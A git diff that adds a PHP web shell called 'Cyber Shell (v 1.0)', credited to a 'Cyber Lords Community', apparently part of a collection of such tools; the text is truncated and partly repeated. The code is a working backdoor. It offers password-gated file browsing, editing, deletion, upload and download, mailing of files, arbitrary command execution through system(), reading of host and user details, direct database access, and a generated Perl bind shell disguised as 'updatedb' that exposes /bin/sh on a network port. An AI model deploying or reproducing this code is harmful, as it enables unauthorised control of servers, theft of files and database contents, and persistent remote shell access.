+'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQAA4DASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD1yy1G3sdEtDPDEIorCCRpXOOWGAMAHuPqc9K4bx5481Twp4c03xVolpaRjU3EM1rcozqzbSRINrLzhQAeMjGc4Xb1NpqOhTaXpznX9MgnS1hU754yyMq8YBbgjceoNeb/AB2u9IPw+0TT9M1K1uxbXaIBFOrsFETgE4NN8ttNyVe+ux//2Q==',
+'bg'=>
+'R0lGODlhCAAbAPQAAOTq8uLp8uDo8d7m8N3l79vj7tni7dfh7dXf7NTe69Pe69Ld6tLc6tDb6c7a6MzY6MrX58nW5sfU5cXT5MPS48PR48HQ4sLQ48DP4r/P4r7O4b7N4b3N4b3N4L3M4LzM4CwAAAAACAAbAAAFXCAgjmJgnqagrurgvi4hz3Jh37ah7/rh/z6EcChUGI8KhnK5aDae0KdjSp0+rtgrZMvdRr7gr2RMHk/O6HNlza5Y3nBLZk7PYO6bvH7z6fv3gBt1c3cYcW9tiRQhADs=',
+'file'=>
+'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQAA4DASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDrLnXbbSoILeLwJe6uyW8Baa0tWkDl4wxyQhAI4yCc/MDzzjITx9q+n3Go3VloUmjwRtbqbDUYHUsZBJh1XIwB5DcgDO85ztGNBtRjkaykiu9FdIFV4zJrcttIC1qsLhlSJsEc4YNuHYjJB5nXI0g0V1N/p0xLWsMMVrfG5ZUj+1MSSYowqjzlVVAwAoHHFXzQ5Lcvvd/L+vX16A91Y//Z',
+);
+@ob_clean();
+header("Content-type: image/gif");
+header("Cache-control: public");
+header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+header("Cache-control: max-age=".(60*60*24*7));
+header("Last-Modified: ".date("r",filemtime(__FILE__)));
+echo base64_decode($img[$imgname]);
+die;
+}
+
+if ($_GET[pass]==$aupassword)
+{
+$_SESSION[aupass]=md5($aupassword);
+}
+if ($hiddenmode=="false")
+if ((!isset($_GET[pass]) or ($_GET[pass]!=$aupassword)) and ($_SESSION[aupass]==""))
+{
+$diz="ok";
+echo "
+$style















    
+
    
+
+
+
+
+
+
+
+
+
+
+
    
+Enter your password:
+
    
+
+
    
+
+
    
+
    
+";
+}
+if ($_SESSION[aupass]!="")
+{
+if (!$_GET and !$_POST or isset($pass)) 
+$show="start";
+
+function ext($str){
+for ($i=1; $i",">",$str);
+return $str;
+}
+function fsize($filename){
+$s=filesize($filename);
+if ($s>1048576){
+return round(($s/1048576),2)." mb";
+}
+if ($s>1024){
+return round(($s/1024),2)." kb";
+}
+return $s." byte";
+}
+function tourl($str){
+$str= urlencode($str);
+return $str;
+}
+function unbug($str){
+$str = stripslashes($str);
+return $str;
+}
+function countbyte($filesize) {
+if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }
+elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }
+elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }
+else { $filesize = $filesize . ""; }
+return $filesize;
+}
+function downloadfile($file) {
+if (!file_exists("$file")) die;
+$size = filesize("$file");
+$filen=extractfilename($file);
+header("Content-Type: application/force-download; name=\"$filen\"");
+header("Content-Transfer-Encoding: binary");
+header("Content-Length: $size");
+header("Content-Disposition: attachment; filename=\"$filen\"");
+header("Expires: 0");
+header("Cache-Control: no-cache, must-revalidate");
+header("Pragma: no-cache");
+readfile("$file");
+die;
+}
+
+function anonim_mail($from,$to,$subject,$text,$file){
+ $fp = fopen($file, "rb");
+ while(!feof($fp))
+  $attachment .= fread($fp, 4096);
+  $attachment = base64_encode($attachment);
+  $subject = "sendfile  (".extractfilename($file).")";
+  $boundary = uniqid("NextPart_");
+  $headers = "From: $from\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+  $info  = $text;
+  $filename=extractfilename($file);
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$filename \nContent-disposition: inline; filename=$filename \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+  $send = mail($to, $subject, $info, $headers);
+fclose($fp);
+echo "";
+die;
+}
+if (!empty($_GET[downloadfile])) downloadfile($_GET[downloadfile]);
+if (!empty($_GET[mailfile])) anonim_mail($email,$email,$_GET[mailfile],'File: '.$_GET[mailfile],$_GET[mailfile]);
+
+$d=$_GET[d];
+if (empty($d) or !isset($d)){
+$d=realpath("./");
+$d=str_replace("\\","/",$d);
+}
+$showdir="";
+$bufdir="";
+$buf = explode("/", $d);
+for ($i=0;$i$d
+
+$style
+
+
+
+    
+    
+    
+    
+    
+  
+
    
+
    $showdir
    
+EOF;
+
+function perms($file) 
+{ 
+$mode=fileperms($file);
+if( $mode & 0x1000 ) 
+$type='p';
+else if( $mode & 0x2000 ) 
+$type='c'; 
+else if( $mode & 0x4000 ) 
+$type='d'; 
+else if( $mode & 0x6000 ) 
+$type='b'; 
+else if( $mode & 0x8000 ) 
+$type='-';
+else if( $mode & 0xA000 ) 
+$type='l'; 
+else if( $mode & 0xC000 ) 
+$type='s'; 
+else 
+$type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-'; 
+$owner["write"] = ($mode & 00200) ? 'w' : '-'; 
+$owner["execute"] = ($mode & 00100) ? 'x' : '-'; 
+$group["read"] = ($mode & 00040) ? 'r' : '-'; 
+$group["write"] = ($mode & 00020) ? 'w' : '-'; 
+$group["execute"] = ($mode & 00010) ? 'x' : '-'; 
+$world["read"] = ($mode & 00004) ? 'r' : '-'; 
+$world["write"] = ($mode & 00002) ? 'w' : '-'; 
+$world["execute"] = ($mode & 00001) ? 'x' : '-'; 
+if( $mode & 0x800 ) 
+$owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x400 ) 
+$group["execute"] = ($group['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x200 ) 
+$world["execute"] = ($world['execute']=='x') ? 't' : 'T'; 
+$s=sprintf("%1s", $type); 
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); 
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); 
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); 
+return trim($s);
+} 
+
+function updir($dir){
+if (strlen($dir)>2){
+for ($i=1; $i
+  
    
+Ââåğõ
+    
+Íàçàä
+    
+ íà÷àëî
+    
+Èíñòğóìåíòû
+    
+Ê ñïèñêó
+    
    
+EOF;
+
+$free = countbyte(diskfreespace("./"));
+if (!empty($free)) echo "Äîñòóïíîå äèñêîâîå ïğîñòğàíñòâî : $free
    ";
+$os=exec("uname");
+if (!empty($os)) echo "Ñèñòåìà :".$os."
    ";
+if (!empty($REMOTE_ADDR)) echo "Âàø IP: $REMOTE_ADDR   $HTTP_X_FORWARDED_FOR
    ";
+$ghz=exec("cat /proc/cpuinfo | grep GHz");
+if (!empty($ghz)) echo "Èíôà î æåëåçå:(GHz)".$ghz."
    ";
+$mhz=exec("cat /proc/cpuinfo | grep MHz");
+if (!empty($mhz)) echo "Èíôà î æåëåçå:(MHz) ".$mhz."
    ";
+$my_id=exec("id");
+if (!empty($my_id)) echo "
    Ïîëüçîâàòåëü:".$my_id."
    ";
+}
+
+function showdir($df) {
+$df=str_replace("//","/",$df);
+$dirs=array();
+$files=array();
+if ($dir=opendir($df)) {
+while (($file=readdir($dir))!==false) {
+if ($file=="." || $file=="..") continue;
+if (is_dir("$df/$file")){
+$dirs[]=$file;}
+else {
+$files[]=$file;}}}
+closedir($dir);
+sort($dirs);
+sort($files);
+echo <<< EOF
+
+EOF;
+for ($i=0; $i
+    
+    
+    
+    
+    
+  
+EOF;
+}
+for ($i=0; $i
+    
+    
+    
+    
+    
+  
+EOF;
+}
+echo "
    $dirs[$i]Óäàëèòü
    Êàòàëîã
    		$perm
    $files[$i]  ($fsize)ren/del/get/mail
    $attr
    		$perm
    ";
+if (count($dirs)==0 && count($files)==0){
+echo <<< EOF
+
+  
+    
+  
+
    Ïàïêà ïóñòà
    
+EOF;
+}}
+
+$edit=$_REQUEST[edit];
+if (isset($_REQUEST[edit]) && (!empty($_REQUEST[edit])) && (!isset($_REQUEST[ashtml])) ){
+$file=fopen($edit,"r") or die ("Íåò äîñòóïà ê ôàéëó $edit");
+if (filesize($edit) > 0)
+$tfile=fread($file,filesize($edit)) or die ("Íåò äîñòóïà ê ôàéëó $edit");
+else $tfile = "";
+fclose($file);
+$tfile = htmlspecialchars($tfile,ENT_QUOTES);
+echo "
+
    
+
    ";
+$mydir=updir($edit);
+echo "
+Âåğíóòüñÿ ê $mydir/
    
+Âû ğåäàêòèğóåòå ôàéë : $edit
    
+Ïğîñìîòğåòü ıòîò ôàéë â âèäå HTML
+
    
+
+
    
+";
+if (!isset($_REQUEST[readonly]))
+echo "";
+echo "
+
    
+
    
+
    
+";
+}
+if (isset($edit) && (!empty($edit)) && (isset($ashtml))){
+$mydir=updir($edit);
+echo "
+
    
+Âåğíóòüñÿ ê $mydir/
    
+Âû ïğîñìàòğèâàåòå ôàéë : $edit
+
    
+";
+readfile($edit);
+echo "
+
    
+
    
+";
+}
+
+if (isset($texoffile) && isset($nameoffile))
+{
+$texoffile=unbug($texoffile);
+$f = fopen("$nameoffile", "w") or die ("Íåò äîñòóïà ê ôàéëó $nameoffile");
+fwrite($f, "$texoffile");
+fclose($f);
+$mydir=updir($nameoffile);
+echo "";
+die;
+}
+
+if (isset($_REQUEST[delfile]) && ($_REQUEST[delfile]!=""))
+{
+$delfile=$_REQUEST[delfile];
+$mydir=updir($delfile);
+$deleted = unlink("$delfile");
+echo "";
+die;
+}
+
+function deletedir($directory) {
+if ($dir=opendir($directory)) {
+while (($file=readdir($dir))!==false) {
+if ($file=="." || $file=="..") continue;
+if (is_dir("$directory/$file"))  {
+deletedir($directory."/".$file);} 
+else {unlink($directory."/".$file);}}}
+closedir($dir);
+rmdir("$directory/$file");
+}
+if (isset($_REQUEST[deldir]) && (!empty($_REQUEST[deldir]))){
+$deldir=$_REQUEST[deldir];
+$mydir=updir(updir($deldir));
+deletedir("$deldir");
+echo "";
+die;
+}
+
+if (isset($show)){showdir("$d");}
+
+{
+if (isset($_REQUEST[tools]))
+echo <<< EOF
+
    
+
+
+
+
+
    
+.: Äåéñòâèÿ äëÿ äàííîé ïàïêè :.
+
    
+
    
+EOF;
+if (isset($_REQUEST[tools]) or isset($_REQUEST[tmkdir]))
+echo <<< EOF
+
    
+
+
+
+
+
+
+
+
    
+
    
+.: Ñîçäàòü ïàïêó :.
+
    
+
+
+
+
+
    
+
    
+EOF;
+
+if (isset($newdir) && ($newdir!=""))
+{
+$mydir=updir($newdir);
+mkdir($newdir,"7777");
+echo "";
+}
+
+if(@$_GET['rename']){
+echo "RENAME $d/$filetorename ?

    
+
    
+
    
+RENAME
    $filetorename

    TO
    
+

    
+
+
    
+";
+@$rto=$_POST['rto'];
+if($rto){
+$fr1=$d."/".$filetorename;
+$fr1=str_replace("//","/",$fr1);
+$to1=$d."/".$rto;
+$to1=str_replace("//","/",$to1);
+rename($fr1,$to1);
+echo "File 
    $filetorename
    Renamed to $rto

    ";
+echo "";}
+echo $copyr;
+exit;
+}
+
+if (isset($tools) or isset($tmkfile))
+echo <<< EOF
+
    
+
+
+
+
+
+
+
+
    
+
    
+.: Ñîçäàòü ôàéë :.
+
    
+
+
+
+
+
    
+
    
+EOF;
+
+if (isset($newfile) && ($newfile!="")){
+$f = fopen("$newfile", "w+");
+fwrite($f, "");
+fclose($f);
+$mydir=updir($newfile);
+echo "";
+}
+
+if (isset($tools) or isset($tbackdoor))
+echo <<< EOF
+
    
+
+
+
+
+
+
+
+
    
+
    
+.: Îòêğûòü ïîğò :.
+
    
+Èìÿ ñêğèïòà:  Ïîğò: 
+
+
+
+
+
    
+
    
+EOF;
+
+if (isset($bfileneme) && ($bfileneme!="") && isset($bport) && ($bport!="")){
+$script="
+#!/usr/bin/perl
+\$port = $bport; 
+\$port = \$ARGV[0] if \$ARGV[0];
+exit if fork;
+\$0 = \"updatedb\" . \" \" x100;
+\$SIG{CHLD} = 'IGNORE';
+use Socket;
+socket(S, PF_INET, SOCK_STREAM, 0);
+setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(S, sockaddr_in(\$port, INADDR_ANY));
+listen(S, 50);
+while(1)
+{
+	accept(X, S);
+	unless(fork)
+	{
+		open STDIN, \"<&X\";
+		open STDOUT, \">&X\";
+		open STDERR, \">&X\";
+		close X;
+		exec(\"/bin/sh\");
+	}
+	close X;
+}
+";
+
+$f = fopen("$d/$bfileneme", "w+");
+fwrite($f, $script);
+fclose($f);
+system("perl $d/$bfileneme");
+echo "";
+}
+
+if (isset($tools) or isset($tbash))
+echo <<< EOF
+
    
+
+
+
+
+
+
+
+
    
+
    
+
+.: Âûïîëíèòü êîìàíäó :.
+
    
+
+
+
+
+
+
    
+
    
+EOF;
+
+if (isset($cmd) && ($cmd!="")){
+echo "
    ";
+system($cmd);
+echo "
    ";
+}
+
+if (isset($tools) or isset($tupload)){
+$updir="$d/"; 
+if(empty($go)) {
+echo <<< EOF
+
    
+
+
+
+
+
+
+
+
    
+
    
+.: Çàêà÷àòü ôàéë â òåêóùèé êàòàëîã :.
+
    
+
+
+
+
+
+
+
    
+
    
+EOF;
+}
+else {
+if (is_uploaded_file($userfile)) { 
+$fi = "Çàêà÷åí ôàéë $userfile_name ğàçìåğîì $userfile_size áàéò â äèğåêòîğèş $updir";
+}
+echo "$fi
    Íàçàä ê êàòàëîãó";
+}
+if (is_uploaded_file($userfile)) {
+$dest=$updir.$userfile_name;
+move_uploaded_file($userfile, $dest);
+}}
+
+if ((isset($db_server)) || (isset($db_user)) || (isset($db_pass))  ){
+mysql_connect($db_server, $db_user, $db_pass) or die("íå ìîãó ïîäêëş÷èòüñÿ ê áàçå");
+}
+
+if ((isset($dbname)) and (isset($table)) )
+{
+foreach($_POST as $var => $val)
+if (substr($var,0,7) == 'newpole'){
+if (substr($var,7,strlen($var)) !== ''){
+$indif=substr($var,7,strlen($var));
+echo " $val ";
+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+if ($xvar == "") 
+$xvar .= $indif;
+else
+$xvar .= ",".$indif;
+if ($xval == "") 
+$xval .= "'$val'";
+else
+$xval .= ",'$val'";
+}}
+
+if ($xvar != ""){
+mysql_query("INSERT INTO $table ($xvar) values ($xval)");
+}
+
+echo "Íàçàä ê ñïèñêó òàáëèö ÁÄ:$dbname";
+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+$re=mysql_query("select * from $table");
+echo "";
+
+$res=mysql_fetch_array($re);
+echo "";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if ($nvar == 128945432){
+$var=untag($var);
+echo "";
+}}
+echo "";
+
+if (isset($_SESSION[limit]) and ($_SESSION[limit] !== "0"))
+$param="limit $_SESSION[limit]";
+
+$re=mysql_query("select * from $table $param");
+
+while($res=mysql_fetch_array($re)){
+echo "";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if (!$pixidname){
+$pixidname=$var;
+$pixid=$val;
+}
+if ($nvar == 128945432){
+$valtext=untag($val);
+if ($valtext == "") $valtext="=Ïóñòî=";
+
+
+if ($_SESSION[lenth] == "on"){
+if (strlen($valtext)>40){
+$valtext=substr($valtext,0,40);
+$valtext .="...";
+}}
+
+echo "";
+}}
+
+echo "";
+$pixidname='';
+$pixid='';
+}
+
+echo "";
+
+$re=mysql_query("select * from $table");
+$res=mysql_fetch_array($re);
+echo "";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if ($nvar == 128945432){
+$var=untag($var);
+echo "";
+}}
+echo "";
+
+$re=mysql_query("select * from $table");
+$res=mysql_fetch_array($re);
+echo "";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if ($nvar == 128945432){
+$var=untag($var);
+echo "";
+}}
+echo "";
+echo "
    $var
    $valtextÓäàëèòü
    $var
    ";
+echo "";
+echo "
+
+
+
+
+
+";
+echo "";
+}
+
+if ((isset($dbname)) and (isset($mtable)) and (isset($pixidname)) and (isset($pixid)) and (isset($del))){
+echo "hello";
+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+mysql_query("delete from $mtable where $pixidname='$pixid'");
+echo "";
+}
+
+if ((isset($dbname)) and (isset($mtable)) and (isset($var)) and (isset($pixidname)) and (isset($pixid)) and (isset($textofmysql))){
+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+mysql_query("update $mtable set $var='$textofmysql' where $pixidname=$pixid");
+}
+
+if ((isset($dbname)) and (isset($mtable)) and (isset($var)) and (isset($pixidname)) and (isset($pixid))){
+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+$re=mysql_query("select $var from $mtable where $pixidname='$pixid'");
+$res=mysql_fetch_array($re);
+$text=untag($res[$var]);
+
+echo "
+
    
+
+
+
+
+
+
+
+
+
+
    
+
    
+Âåğíóòüñÿ ê ñïèñêó
+";
+}
+
+if (isset($showdb) && empty($showtables)){
+$re=mysql_query("show databases");
+echo "";
+echo "";
+while($res=mysql_fetch_array($re)){
+echo "";
+}
+echo "
    Ñïèñîê äîñòóïíûõ ÁÄ:
    $res[0]
    ";
+}
+if (isset($showtables) and !empty($showtables)){
+
+if (isset($xlimit)){
+$_SESSION[limit]=$xlimit;
+if (isset($xlenth))
+$_SESSION[lenth]=$xlenth;
+else $_SESSION[lenth]="";
+}
+
+echo "Íàçàä ê ñïèñêó ÁÄ";
+$re=mysql_query("SHOW TABLES FROM $showtables");
+echo "";
+echo "";
+while($res=mysql_fetch_array($re)){
+echo "";
+}
+echo "
    $showtables - Ñïèñîê òàáëèö: 
    $res[0]
    ";
+
+if (($_SESSION[lenth]) == "on")
+$ch="checked";
+else
+$ch="";
+
+echo <<< EOF
+
    
+
+
+
+
+îãğàíè÷åíèå íà êîëè÷åñòâî âûâîäèìûõ ïîëåé:
    
+
+
    Âêëş÷èòü îãğàíè÷åíèå íà äëèíó âûâîäèìûõ ïîëåé 
    
+
+EOF;
+if (isset($_SESSION[limit]) and ($_SESSION[limit] !== "0"))
+echo "
    Òåêóùåå îãğàíè÷åíèå: $_SESSION[limit]";
+}
+
+if (isset($tools) or isset($tmysql))
+echo "
+
    
+
+
+
+
+
+
+
+
    
+.: MySQL :.
+
    
+
+
+
+
+
+
+
+ 
+
+
+ 
+ 
+
+
+ 
+ 
+
+
+
+
+
+
    
+Host
+
+
+
    
+Login MySQL
+
+ 
+
    
+Password MySQL
+
+
+
+
    
+Èìÿ ÁÄ (íå îáÿçàòåëüíî)
+
+
+
    
+
+
+
+
    
+
+
    
+
    
+";
+}
+echo <<< EOF
+
    .:Cyber Shell (v 1.0):.
    Copyright © Cyber Lords Community, 2002-2006
    
+
+
+
+EOF;
+
+$d=tourl($d);
+echo "
+
    
+
+.: Ñîçäàòü ïàïêó :.
+.: Ñîçäàòü ôàéë :.
+.: Îòêğûòü ïîğò äëÿ ïîäêëş÷åíèÿ :.
    
+.: Bash :.
+.: Çàêà÷àòü ôàéë :.
+    
+
    
+";
+}
+die;
+?>
diff --git a/php/Cyber Shell.php b/php/Cyber Shell.php
new file mode 100644
index 0000000..5eaa6c7
--- /dev/null
+++ b/php/Cyber Shell.php	
@@ -0,0 +1,1033 @@
+
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+SCROLLBAR-FACE-COLOR: #363d4e;
+SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
+SCROLLBAR-SHADOW-COLOR: #363d4e;
+SCROLLBAR-ARROW-COLOR: #363d4e;
+SCROLLBAR-TRACK-COLOR: #91AAFF
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: white;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:link {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:hover {
+COLOR: #FF0C0B;
+TEXT-DECORATION: none
+}
+A:active {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:visited {
+TEXT-DECORATION: none
+}
+";
+
+foreach($_POST as $key => $value) {$$key=$value;}
+foreach($_GET as $key => $value)  {$$key=$value;}
+
+if (isset($_GET[imgname]))
+{
+$img=array(
+'dir'=>
+'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQABADASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD1mG6mv7ZbiBbxrhlUtJFMAiOVDbdjOAQAR26d880lzr2paU6T6hbp9gH+ulCKjJkqAQBK+4ZPPAqhDB4i0pXtbfRvtUYYFZluo0DAKq9Ccj7ufxqlq9n4p1qyksn0IQLKoQyNeRsF+dGzgdfu/rXi0ni4tJxZ2S9n3Vj/2Q==',
+'txt'=>
+'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQAA4DASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD1yy1G3sdEtDPDEIorCCRpXOOWGAMAHuPqc9K4bx5481Twp4c03xVolpaRjU3EM1rcozqzbSRINrLzhQAeMjGc4Xb1NpqOhTaXpznX9MgnS1hU754yyMq8YBbgjceoNeb/AB2u9IPw+0TT9M1K1uxbXaIBFOrsFETgE4NN8ttNyVe+ux//2Q==',
+'bg'=>
+'R0lGODlhCAAbAPQAAOTq8uLp8uDo8d7m8N3l79vj7tni7dfh7dXf7NTe69Pe69Ld6tLc6tDb6c7a6MzY6MrX58nW5sfU5cXT5MPS48PR48HQ4sLQ48DP4r/P4r7O4b7N4b3N4b3N4L3M4LzM4CwAAAAACAAbAAAFXCAgjmJgnqagrurgvi4hz3Jh37ah7/rh/z6EcChUGI8KhnK5aDae0KdjSp0+rtgrZMvdRr7gr2RMHk/O6HNlza5Y3nBLZk7PYO6bvH7z6fv3gBt1c3cYcW9tiRQhADs=',
+'file'=>
+'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQAA4DASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK